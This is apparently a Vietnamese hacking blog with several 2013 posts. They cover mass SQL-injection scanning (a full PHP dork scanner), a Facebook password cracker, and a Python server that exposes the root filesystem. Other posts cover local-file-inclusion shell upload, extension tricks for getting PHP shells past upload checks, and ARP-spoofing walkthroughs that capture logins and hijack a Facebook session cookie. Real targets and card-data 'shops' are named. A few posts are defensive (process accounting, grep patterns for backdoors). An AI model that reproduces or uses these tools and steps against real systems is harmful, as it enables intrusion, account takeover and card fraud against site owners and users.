Thứ Tư, 5 tháng 6, 2013

Scan sqli all server

Đây là tool rất hay.Hãy nghĩ lúc bạn tìm đc 1 shop chắc chắc có cc .Họăc một site bạn cần phải hack.nhưng nó lại ko có lỗi.Đi check tay toàn server thì mất nhiều thời gian.Đôi khi ta bỏ.Tool này check toàn server.Nhanh gọn nhé.Hihi
lệnh
Scan 1 website:
./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt
Scan toàn bộ server

 ./Domain-SQLi-finder.py --verbose 1 --durl demo.testfire.net --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt

Tải file tại đây



wget http://www.chilkatsoft.com/download/chi ... nux.tar.gz
tar xvf chilkat-9.4.0-python-2.7-i686-linux.tar.gz 
mv usr/local/lib/python2.7/site-packages/* /usr/local/lib/python2.7/dist-packages

Cài thư viện nếu thiếu nè.
Có thể dùng uniscan cũng oki 
./uniscan.pl -i "ip:xxx.xxx.xxx.xxx" 
đây là scan toàn bộ server

scan 1 site thì ./uniscan.pl -u "http://site.com/" -b -q -d -w

scan theo file list site thì ./uniscan.pl -f site.txt -bqdw

Thứ Ba, 4 tháng 6, 2013

code php scan sqli của darkzone

Code php scan sqli của darkzone.

<html>
<head>
<title>SQLi Scan - Dark Zone</title>

<!--
****************************************************************
*           SQLi Scanner by DarKmindz @ 31337 ZoNe             *
*                                                               *
* Fuck You n00b & Shit Talker & Time Wasters & Scriptkiddiots! *
****************************************************************

Written by DarKmindz @ 31337 ZoNe

Yuck Fou,
./DarkMindz & 
-->

<style>
body{
background: black;
color: red;
font-family: monospace;
font-size: 12px;
}

input{
background: black;
border: 1px solid red;
color: red;
}

h2{
color: red;
}

a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
a:hover{ color: #00FF00; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }

</style>

</head>
<body>

<?php
echo "<center>";
echo "<form action='' method='post'>";
echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
echo "<input type='submit' value=' Fvck It! '>";
echo "<hr><br />";

if($_POST['dork']) {

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

$i = 0;
$a = 0;
$b = 0;

while($b <= 900) {
$a = 0;
flush(); ob_flush();
echo "Pages: [ $b ]<br />";
echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
echo "Scanning Google<br />";
flush(); ob_flush();

if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
echo "Bisey bulunamad?<br />";
flush(); ob_flush();
break;
}

preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
echo "Loadiing…<br />";
flush(); ob_flush();
while(1) {

if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQL Injection Success !</font><br />";
} else {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Not access ! </font><br />";
flush(); ob_flush();
}
if($a > count($sites[2])-2) {
echo "Bitti<br />";
break;
}
$a = $a+1;
}
$b = $b+100;
}
}

function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOW, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function Clean($text) {
return htmlspecialchars($text, ENT_QUOTES);
}
echo "</center>";
?>

</body>
</html>






Scan pass facebook bằng từ điển ver 2.5

Vào đây tải nè! (Có bộ python, file pass và file fb.py để chạy á )

http://www20.zippyshare.com/v/36247489/file.html



#!usr/bin/python

#Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall !

#This program is for educational purposes only.

#Don't attack people facebook accounts it's illegal !


#If you want to crack into someone's account, you must have the permission of the user.


#Mauritania Attacker is not responsible.


import sys

import random

import mechanize

import cookielib

IrisT firewall ver 2 nè

#!/bin/sh
#
# ---------------------------------
# IrIsT FireWall Ver 2.0
# Licence : Linux
# ---------------------------------
#
# Title   : IrIsT Linux FireWall Ver 2.0 
# Code    : Bash 
# Author  : Sajjad13and11
# Date    : 2013 16 May
# Home    : IrIsT Security Center
#
# Gr33tz  : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf | 
# Gr33tz  : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz  : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz  : x3o-1337 | rEd X | No PM  | Gabby | Sukhoi Su-37
# Gr33tz  : ARTA | H-SK33PY | (^_^) | Turk Sever | Dr Koderz |
# Gr33tz  : Joker_s | Mr Zero | Smart Programmer | And All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#

clear 

echo "   ###   ####### #     #  "
echo "    #    #       #  #  #  "
echo "    #    #       #  #  #  "
echo "    #    #####   #  #  #  "
echo "    #    #       #  #  #  "
echo "    #    #       #  #  #  "
echo "   ###   #        ## ##   "


echo  "*****************************************************"
echo  "* IFW Firewall Dedicated Version (2)                *"
echo  "* Coded By Sajjad13and11                            *"
echo  "* IrIsT.Ir && IrIsT.Ir/en                           *"
echo  "* This script don't work on OpenVZ servers          *"
echo  "* The default rules saved in /root/iptables.def     *"
echo  "*****************************************************"

sleep 3

#
iptables-save > /root/iptables.def
MODPROBE="/sbin/modprobe"
RMMOD="/sbin/rmmod"
ARP="/usr/sbin/arp"
IRISTlim="-m limit --limit 2/s --limit-burst 8"
LOG="LOG --log-level debug --log-tcp-sequence --log-tcp-options"
LOG="$LOG --log-ip-options"
PHIGH="1024:65535"
PSSH="1000:1023"

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/ip_forward

for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do echo 0 > $i; done

Sym root bypass open port nếu server cho chạy python

Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.
Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py
#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()





Sau đó chạy nó python capuchino.py

rồi kiểm tra kết quả :victim:7777

Cách này có thể giấu đc kết quả thực hiện sym trên server



Thứ Năm, 30 tháng 5, 2013

Local File Inclusion Vulnerability Demonstration - Shell Upload

Local file inclusion is a very popular web application attack, It was very common few years back. However now a days you will rarely find websites vulnerable to this attack. However a single vulnerability can result in getting your website compromised. We have already written an article on Directory transversal attack. Therefore I believe that we need no to go in details about the attack. You might know avinash by now the author of the previous article How Hackers Are Hacking Into Websites On Shared Hosts. However in this article he will demonstrate a local file inclusion vulnerability and he will enhance the attack by uploading a shell on the website.

Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks.

index.php?homepage=
index.php?page=
index.php?index2=

Requirements:

1) A Vulnerable Website
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.



Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it.

Bypass up ảnh

Đổi shell php thành một trong các kiểu.
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;

Thứ Ba, 28 tháng 5, 2013

Accounting -Dò tìm dấu vết chỉnh sửa được thực hiện trên hệ thống Linux

Hoạt động xâm phạm có thể đến từ cả hai phía: người dùng đã biết (nội bộ) và người dùng không xác định (từ bên ngoài). Kinh nghiệm cá nhân của tôi chỉ ra rằng những người không hạnh phúc hay không bằng lòng với cuộc sống thường gây nguy hiểm cho hệ thống của bạn, nhất là khi họ có lớp vỏ bọc truy cập hợp pháp. Một số người khá thông minh, loại bỏ file history (như: ~/.bash_history) hòng tránh bị phát hiện. Nhưng bạn vẫn hoàn toàn có thể giám sát tất cả lệnh thực thi của người dùng.

Lời khuyên ở đây là bạn nên kiểm soát hoạt động người dùng bằng cách sử dụng chương trình xử lý accounting. Chương trình xử lý accounting cho phép bạn xem xét mọi lệnh do người dùng thực thi với thời gian sử dụng CPU và bộ nhớ. Nhờ chương trình này, người quản trị sẽ luôn tìm ra được mọi lệnh thực thi ở bất kỳ thời gian nào.


Gói xử lý accounting gồm một số tiện ích giám sát các hoạt động chương trình như ac, lastcomm, accton và sa.


• Câu lệnh "ac" thể hiện lượng thời gian người dùng đăng nhập hệ thống.

• Câu lệnh "lastcomm" cho biết thông tin của các lệnh thực thi trước đó.
• Câu lệnh "accton" bật tắt chương trình xử lý accounting.
• Câu lệnh "sa" tóm tắt thông tin về các lệnh được thực thi trước đó.

Cài đặt gói psact hoặc acct


Dùng lệnh up2date nếu bạn đang dùng RHEL:


# up2date psacct


Dùng lệnh yum nếu bạn đang dùng nhân Linux CentOS/Fedora:


# yum install psacct


Dùng lệnh apt-get nếu bạn đang dùng Linux Ubuntu / Debian:


$ sudo apt-get install acct OR # apt-get install acct


Khởi động dịch vụ psacct/acct


Mặc định, dịch vụ này khởi động trên Ubuntu / Debian Linux bằng cách tạo ra file "/var/account/pacct". Nhưng ở hệ điều hành Red Hat /Fedora Core/Cent OS, bạn cần tự khởi động "psacct". Gõ hai lệnh sau để tạo file "/var/account/pacct" và khởi động các dịch vụ:


# chkconfig psacct on

# /etc/init.d/psacct start

Nếu bạn đang dùng Suse Linux, tên của dịch vụ là "acct". Gõ các lệnh sau:


# chkconfig acct on

# /etc/init.d/acct start

Bây giờ chúng ta hãy xem cách khai thác các tiện ích này để giám sát lệnh và thời gian người dùng.


Hiển thị số liệu thời gian kết nối của người dùng


Câu lệnh "ac" đưa ra số liệu thời gian kết nối theo giờ dựa trên các lệnh login/logout. Số lượng tổng cộng cũng được đưa ra. Nếu bạn gõ lệnh "ac" không có bất kỳ tham số nào, nó sẽ đưa ra lượng thời gian kết nối tổng:


$ ac


Xuất ra:


total 95.08

Thứ Sáu, 10 tháng 5, 2013

Tìm shell trên site


Thao tác bằng shell hoặc lện server.

Common Usage for Finding Vulnerabilities

- Command Injection

$ grep -Rn "shell_exec *( " /var/www

- LFI/RFI

$ grep -Rn "include *(" /var/www
$ grep -Rn "require *(" /var/www
$ grep -Rn "include_once *(" /var/www
$ grep -Rn "require_once *(" /var/www




Detect Backdoor Shell

$ grep -Rn "shell_exec *(" /var/www
$ grep -Rn "base64_decode *(" /var/www
$ grep -Rn "phpinfo *(" /var/www
$ grep -Rn "system *(" /var/www
$ grep -Rn "php_uname *(" /var/www
$ grep -Rn "chmod *(" /var/www
$ grep -Rn "fopen *(" /var/www
$ grep -Rn "fclose *(" /var/www
$ grep -Rn "readfile *(" /var/www
$ grep -Rn "edoced_46esab *(" /var/www
$ grep -Rn "eval *(" /var/www
$ grep -Rn "passthru *(" /var/www
orgrep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www



find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\("


Sử dụng tool scan shell.

Msf continue

Tác giả:Sp iCarus ý
Mình đã viết một bài về Metasploit framwork rồi.
Phần này mình viết tiếp về nó.Dù nó ko liên quan gì lắm với nhau :))
Phần này mình đề cập tiếp đến vấn đề scan mục tiêu cần attack đã nói trong phần trước.
Scan mục tiêu là vấn đề rất quan trọng.thu thập đc càng nhiều thông tin càng tốt.Chả thừa gì đối với chúng ta cả.
Trong metasploit framework có một module  sử dụng bộ công cụ scan nmap .Trong quá trình họat động nó sử dụng giữ liệu thu đc bằng quá trình scan bởi nmap một cách tự động.
Như mình từng đề cập ở nhiều bài trước.Làm gì thì làm.Trước khi dùng mấy bộ công cụ này thì tốt nhất là nên update trước.Dữ liệu của nó cập nhật theo ngày.Nên update là ko thừa.

Step1: Vào msfconsole ,rồi type db_nmap


root@bt:~# msfconsole

msf > db_nmap


  [*] Usage: db_nmap [nmap options]


Nhận đc thông báo nmap_option --> ta có thể sử dụng các option của nmap thông thường.
Thử scan victim nào đó nhé.Hộm nó mới có con shell trên honda67.com mấy mem up lên huynhdegroup.net.Hôm nay vào tên nào đã deface rồi.Nên lấy nó test luôn.
Ip của honda67.com là 112.78.2.15

msf > db_nmap 112.78.2.15



reverse ip by perl

 reverse.pl
#!/usr/bin/env perl
# RitX - Reverse IP Tool v1.3
# Copyright (C) 2011-2012
# r0b10S-12 <r12xr00tu@gmail.com>
# #p0c.cc

# Change Log:
# 1.3:
#   Rename the script to RitX.
#   Rewrite the entire code.
#   Now RitX is command line tool.
#   Better performance.
#   add the multi-threading functions.
#   Now results are more accurate.
#   Fix all broken Regex and bugs.
# 1.2:
#   Added 2 more websites .
#   Removed all dead services . 
#   Fix some bugs.
#   Made some changes.
# 1.0:
#   Rit initial release.

findadmin.perl

findadmin.perl
#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

system('cls');
system('title Admin CP Finder ');
system "color 0a";
print"\n";
print

find admin by perl

findadmin.perl
#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

system('cls');
system('title Admin CP Finder ');
system "color 0a";
print"\n";
print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";

Hướng dẫn NewBie Vào Hacking

 Tác giả:Sư phụ iCarus
Tình hình là có khá nhiều bạn pm mình hỏi cách check site.Mà Mình cũng không có nhiều thời gian để chỉ từng bạn.Nên mình viết cái đường đi.Tư duy check site để các bạn đọc.Từ đó có một cái định hướng.Tự mình nghiên cứu.Thực hiện.

 Điều đầu tiên mình muốn nói đó là muốn tấn công 1 site.Điều đầu tiên bạn cần có đấy là sự kiên nhẫn.Cóp nhặt từng tí một.Không thể nôn nóng mà bỏ qua nhiều thông tin.Dẫn đến giảm hiệu quả.Không phải website nào tấn công 1 phát cũng là được ngay.Chính vì thế nên phải tích từng đi thông tin một.

Nếu để kiếm một site để check chơi thì tốt nhất là các bạn nên dùng các dork tìm các site có lỗi sẵn.Ví dụ như các dork sqli .Các dork của các phiên bản joomla ,vbulletin có lỗi.Như vậy sẽ hiệu quả hơn là tìm 1 site bất kì rồi xem thử nó có lỗi không. (Ngoài ra còn có một cách nhanh hơn nữa đó là dùng tool scan dork.Nó sẽ tìm cho bạn một khối site bị lỗi có thể check được từ một list dork có sẵn.Cái này hiệu quả hơn cho dân UG lúc tìm shop lỗi.)

Còn nếu bạn muốn tấn công một website xác định.Thì việc này khó hơn.Giả sử victim của bạn có domain là target.com .Để tấn công victim một cách hiệu quả.(Mình nói ở đây là cả đối với host share và private.Site lớn có bảo mật tốt,lẫn site nhỏ,forum. ) .

 Bước 1:Lấy thông tin ban đầu.

   Lấy thông tin của victim .Bằng các whois nó.Tìm hiểu càng nhiều thông tin về victim càng tốt.Và google ,bing ,yandex .... đều là các công cụ hữu ích.Mình khuyên nên thử với nhiều công cụ tìm kiếm.Vì bản thân thuật toán tìm kiếm của các công cụ này khác nhau nên dẫn đến cho nhiều kết quả với hiệu quả khác nhau.
Ví dụ như nhập vào công cụ search như sau

ip:123.101.11.122 id=

Nó sẽ cho ta một số thông tin thú vị.Bạn hãy cố gắng thu thập thông tin ban đầu càng nhiều càng tốt.Chủ sở hữu domain.Admin của website.Support.Kể cả số điện thoại , facebook,gmail ,yahoo, địa chỉ mail của công ty.1 Attacker giỏi là một attacker có khả năng tận dụng mọi sơ hở.Mọi điểm yếu có thể tấn công.

Thứ Bảy, 30 tháng 3, 2013

MITM


Man In The Middle . 

Phương pháp tấn công đc hình dung qua chính cái tên gọi của nó.Là một phương pháp cơ bản và làm nền tảng chung cho nhiều kĩ thuật tấn công.Ở đây attacker đóng vai trò là người trung gian,đứng giữa,giả mạo trong phiên làm việc giữa victim và một máy chủ nào đó.Mọi gói tin xuất phát từ victim đến máy chủ hay ngược lại đề đi qua máy attacker ,nếu đc attacker forward .
Xem mô hình dưới đây:

    Ta thấy attacker đã chèn vào giữa phiên giao dịch của victim và máy chủ.Vậy làm sao attacker làm đc điều này.Và các công cụ sniffer dùng phương pháp MITM như thế nào.
    Đầu tiên nói sơ qua cơ chế giao tiếp bình thường giữa victim và máy chủ khi attacker chưa tác động lên hệ thống.Khi 2 host giao tiếp với nhau,chúng cần địa chỉ nguồn và địa chỉ đích đến.Và do hiện nay người ta dùng các giao thức khác nhau trên tầng giao vận(IP,IPX) ,chính vì thế dẫn đến việc không thống nhất đối với các thiết bị .Có thể thiết bị này tương thích nhưng thiết bị khác lại không.Chính vì vậy sinh ra việc dùng ip MAC.Xem như là một tiêu chuẩn chung tương thích với các thiết bị khác nhau.Nhưng làm sao để từ IP có thể phiên ra ip MAC và ngược lại.Việc phiên dịch này là do giao thức ARP (address resolution protocol) thực hiện.
  Ta xem xét một bản tin ARP để thấy được việc phiên dịch IP-MAC.Một bản tin arp gồm các trường sau:


Hardware type :Qui định kiểu của phần cứng.
HW addr length : Cho biết độ dài của địa chỉ MAC ( ghi bằng mã hex)
Protocol type : Cho biết kiểu của giao thức.
Protocol addr length : Cho biết độ dài của địa chỉ IP
Opcode : thể hiện đây là bản tin request (1) hay là bản tin reply (2)
Các trường còn lại như source hardware address ,source protocol address,destination hardware addres ,destination protocol addresss cho biết địa chị vật lí và địa chỉ ip của máy nguồn và máy đích.

Một bản tin arp với thông tin cụ thể có dạng như sau

Ở ví dụ này miêu tả một bản tin của một máy có IP là 192.168.1.1 gửi một bản tin request đến máy có ip là 192.168.1.2
Quá trình đi của gói tin như sau.Máy có ip LÀ 192.168.1.1 gửi một request trong đó có chứ ip và mac của nó,kèm với ip đích đến. Module address resolution sẽ có nhiệm vụ chuyển địa chỉ logic của đích đến thành địa chỉ vật lí.Tiếp tục nó so sánh cặp địa chỉ này với bảng ánh xạ lưu trên ARP cache.Nếu trung lặp thì nó ghi các giá trị này vào ,rồi gửi lại về máy chủ dưới dạng bản tin reply .Nếu không trùng lặp thì nó sẽ gửi tiếp bản tin ARP request đến địa chỉ đích là địa chỉ broadcast (để có thể hỏi hết tất cả máy có trong mạng lan).

Hình thức tấn công này chỉ có tác dụng thực trên mạng LAN.Vì nếu trên mạng WAN,Tại các nut mạng router nó có khả năng ngăn chặn các gói tin broadcast.

Căn cứ vào cơ chế như vậy.Attacker đứng giữa.Liên tục gửi những gói arp reply cho máy chủ và liên tục gửi các gói arp request cho victim.Làm cho cả máy chủ lẫn victim đều hiểu nhầm đối tượng mình đang giao tiếp là ai.

Hiện nay có rất nhiều tool dùng nguyên lí này để sniff các thông tin .Ví dụ như dsnif,ettercap,cain  ,sniffer pro,wireshark,Network Monitor,Ethereal.
Chúng ta sẽ demo các công cụ này.

Đây tiên là demo giả mạo arp trên backtrack [ Phần này mình lấy từ blog capuchino cho nhanh ]


Đầu tiên mở terminal lên.
sửa lại file ip_forward bằng lệnh echo và toán tử viết chèn vào cuối file >> (để cho phép ip đc forward)
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
xong rồi đọc lại file này xem đã ghi thành công chưa nhé,nếu nhận đc là 1 thì là oke
cat /proc/sys/net/ipv4/ip_forward
giả sử ip của victim là 192.168.201.129
trong đó gateway là 192.168.201.2

ta tiếp tục
arpspoof -i eth0 -t 192.168.201.2 192.168.201.129
(nó update lại bản arp cache)
sau khi nó chạy,thì terminal này bị busy,ta ko thể thao tác lệnh tiếp,vì nó phải giữ session lại.
Rất may trên backtrack cho phép ta thao tác đa nhiệm.
Mở 1 terminal khác lên,gõ screen rồi enter .


trên terminal mới tiếp tục
arpspoof -i eth0 -t 192.168.201.129 192.168.201.2




lúc này thì 2 terminal trong nó như vậy.

tiếp tục do terminal này bận nên ta tiếp tục mở 1 terminal khác,type screen và enter.
trên terminal mới ta mở trình driftnet lên
type:sudo driftnet -i eth0.


tiếp tục mở terminal mới,type screen rồi type tiêp
sudo urlsnarf -i eth0
bây giờ nó sẽ lắng nghe trên các port 80,8080 hoặc 3128


Giải sử bi giờ trên victim vào trang google tìm với từ khóa capuchino chẳng hạn nha
thì trên driftnet của mình sẽ bắt đc gói tin hình ảnh truyền về ip 192.168.201.129


đây là hình ảnh trên victim:


đây là hình ảnh get đc và hiện lên driftnet:


tương tự như thế,đối với các trang khác mình cũng xem đc thông tin.biết đc victim làm gì.Xem trên terminal.
Chẳng hạn như xem hình dưới đây,ta thấy victim đang lượn lờ trong vhbsystem




Cain and Abel:

Mình demo bộ tool này trên win7.
đầu tiên down Cain and Abel về ở đây http://www.softpedia.com/progDownload/Cain-and-Abel-Download-38678.html
trước khi cài đặt Cain cần cài đặt WinPcap trước,để tí nữa nó tự tìm card mạng cho mình.Tải WinPcap về ở đây http://www.winpcap.org/install/default.htm
Sau khi cài đặt ,trước khi chạy thì ta chú ý tắt tường lửa đi.Vì để tường lửa có thể sẽ không thực hiện đc.
Mở cain lên chúng ta thấy giao diện ban đầu của nó như sau :



Đầu tiên cần phải config cho nó,ta vào Configure chọn Netword Adapter thích hợp




Sau đó chúng ta scan danh sách host có trong mạng nội bộ.Ấn vào biểu tưởng dấu + màu xanh (hoặc chọn trên thành menu File -Add to list).Rồi Ok


CHuyển sang tab ARP


Kích lên khung trống rồi chọn tiếp biểu tượng + màu xanh để add host victim cần tấn công vào (File - Add to list )

Ta kích chọn vào địa chỉ default gateway đầu tiên rồi Add để add tất cả các host trong mạng nội bộ vào.Tiếp theo chọn victim cần tấn công giả mạo ARP rồi ok.Victim mình chọn ở đây có IP là 192.168.247.128 nhé.

ta kích tiếp vào đối tượng ta vừa add vào rồi chọn Start Arp 



Ta sẽ thấy từ chế độ idle nó sẽ chuyển sang chế độ Poisonning 

bây giờ ta sẽ chờ đợi lắng nghe và bắt các gói tin khi victim giao tiếp với máy chủ.Ví dụ như trên máy victim thực hiện một giao tiếp với giao thức http .Ta bắt được như sau 


tương tự với nhiều gói tin khác cũng thế.Căn bản của việc dùng cain là vậy.Có thời gian các bạn nên nghiên cứu kĩ hơn.Các chức năng mà cain tích hợp.Có rất nhiều lựa chọn làm đa dạng quá trình tấn công,ví dụ như có các option giúp chúng ta chọn một IP hoặc MAC giả mạo,hoặc có thể dùng chính địa chỉ của chúng ta.Vân Vân.

Ettercap:Bộ công cụ được mệnh danh là Lord of the tokenring.

Trên thực tế thì đây là bộ công cụ dùng để phân tích các gói tin đc trao đổi với máy tính.Nguyên tắc làm việc của nó cũng là giả danh địa chi MAC để cho máy đích và máy nguồn nhầm tưởng là đang trao đổi thông tin với nhau.Nhưng thực chất là qua máy có cài ettercap.
Mình sẽ trình bày demo về ettercap với Backtrack .Nếu không có bạn có thể tải về và chạy trên mọi hệ điều hành.
Bộ ettercap đc hỗ trợ nhiều interface khác nhau.
ở đây có 4 interface,mình demo với curses GUI và GTK+GUI
để vào giao diện curses GUI ta gõ dòng lệnh
#ettercap -C
Giao diện xuất hiện như thế này



Ta cấu hình cho nó như sau
Đầu tiên vào Sniff - Unified sniffing để chọn card mạng
Sau khi chọn card mạng rồi thì bắt đầu sniff .Vào Start snifing 

Lúc này đang ở chế độ lắng nghe.Nếu trên mạng nội bộ có một máy nào đó thao tác giao tiếp với mạng,Thì ta có thể bắt đc các bản tin này.


ở đây cho thấy có một victim trong mạng lan và  máy đich có địa chỉ ip 115.77.208.206 có trao đổi các gói tin với nhau với nội dung thông tin có chứa user và pass.Đây là chúng ta bắt gói tin một cách tràn lan trên mạng nội bộ.Muốn bắt đc chính xác từ một victim nào đó.Mà chúng ta mục đích sẵn.Thì đầu tiên ta scan host
Trên menu bar chọn Hosts - Scan for host
Nó sẽ scan toàn bộ netmask cho  chúng ta.Tiếp theo ta chọn tấn công theo hình thức giả mạo ARP .Vào menu MITM - Arp poisoning

Chọn xong nó sẽ hiện ra khung báo chọn parameter,ta bỏ qua không chọn nhấn enter.Nhận đc User messages như sau:



Để tìm tên victim chúng ta muốn bắt bản tin tao vào Menu :View -Connections 


Gói host nào đang ở chế độ active thì ta có thể bắt đc.Và xem nó bằng cách kick vào host đấy,bản tin xem được đc viết dưới dạng đã mã hóa 

Để lưu lại thì ta chọn Logging - Log all packets and infos....
để sau này ta có thể xem lại.


Đối với interface dùng GTK+GUI thì dễ dùng hơn.Mở lên bằng lệnh
#ettercap -G


tương tự Chọn Sniff -> Unified sniffing


Chọn card mạng 


Scan host:Hosts->Scan for hosts


Chọn tiếp :Hosts  ->host list hiện ra như sau




Add gateway vào target 2 và victim vào target 1 , rồichọn Mitm -Arp Poisoning , hiện ra optional parameters


tiếp theo Start - Start sniffing để bắt đầu sniff thôi .
Đây là một bản tin có chứa user và pass ta sniff đc từ victim 



Bộ công cụ test wireshark (Phần này lấy từ blog capuchino .Lần trứoc hướng dẫn capuchino,nên giờ lấy lại công gõ).


đầu tiên ta tải bộ công cụ scan wireshark ở trang chủ wireshark.org về cài đặt.Trước khi cài đặt cái này thì phải tại winPcap về đã.Để tí nữa nó tìm card mạng cho mình [ trang chủ của winPcap ở đây nhé http://www.winpcap.org/install/default.htm ].
Tải xong về mở lên thì đại loại nó có giao diện như thế này



Ta kích vào Interface list để hiện ra danh sách card mạng.
Chọn card mạng mình cần scan.


Sau khi khung capture Interfaces hiện lên thì chọn card [ hoặc network cần scan nhé ].
Bấm start.
Sau khi scan một lúc thì cho nó dừng lại.Scan vừa đủ thôi,chứ chờ nó xong lâu lắm.Tùy lúc mà cho nó dừng lại .

ta thấy các session mà nó scan đc,thông qua các giao thức khác nhau .




Ta mở khung search lên để dễ tìm thấy mục tiêu (Ctrl f)
hoặc Edit /Find packages

Mở lên rồi ta chọn các tùy chọn như search string,Package details




rồi nhập vào chữ datr (cái này là kinh nghiệm thôi,trong cookie facebook nó có chữ này ấy mà.

sau khi seach xong 
ta tìm đc một đối tượng như sau 


ta thấy ngay dòng [truncated ] cookie:datr.....
copy dòng này ra notepad,lấy 2 trường sau,cho vào addon cookie manage của firefox 
c_user=100004847377632; xs=60%3AWKLE4Ztc9cjSBg%3A0%3A1363298090
để copy đc thì ta kích chuột phải chọn copy/bytes/Printable text only 

sau đó add các trường này vào cookie manager
bấm add ,tương tự nhập cho trường xs







f5 và xem thành quả.



















Thứ Sáu, 15 tháng 3, 2013

Các tầng mạng OSI

Mô hình mạng OSI ( Open systems interconnection Reference Model ) .Là mô hình miêu tả cách xây dựng hệ thông giao tiếp mạng. Mô hình này phân chia chức năng của giao thức thành nhiều tầng,Ở đây là 7 tầng.Mỗi tầng có một chức năng khác nhau.Có tầng tương ứng với phần cứng,có tầng tương ứng với phần mềm.Đi theo chiều từ tầng 1 đến tầng 7 cũng là đi theo chiều từ phần cứng đến phần mềm .(Từ những cái trừu tượng đến các tương tác trực tiếp với người dùng).

Tìm hiểu về mô hình OSI ,ta sẽ có cái nhìn tổng quan,và hiểu được rõ hơn các phương pháp tấn công mạng.Tấn công vào tầng nào dễ hơn chẳng hạn.Và tầng nào có thể tấn công.Và vì sao lại chọn tần đó để tấn công.

Capuchino liệt kê ,và nêu một số điểm cơ bản của 7 tầng.

Tầng 1: tầng vật lý ( Physical ).

 Tầng này tương ứng với các thiết bị vật lí như cap ,hub và một số thiết bị tiếp hợp mạng và máy chủ khác.

Tầng 2: Tầng liên kết dữ liệu ( Datalink )


Tầng này là nơi họac động của các thiết bị chuyển mạch ( như switch ).
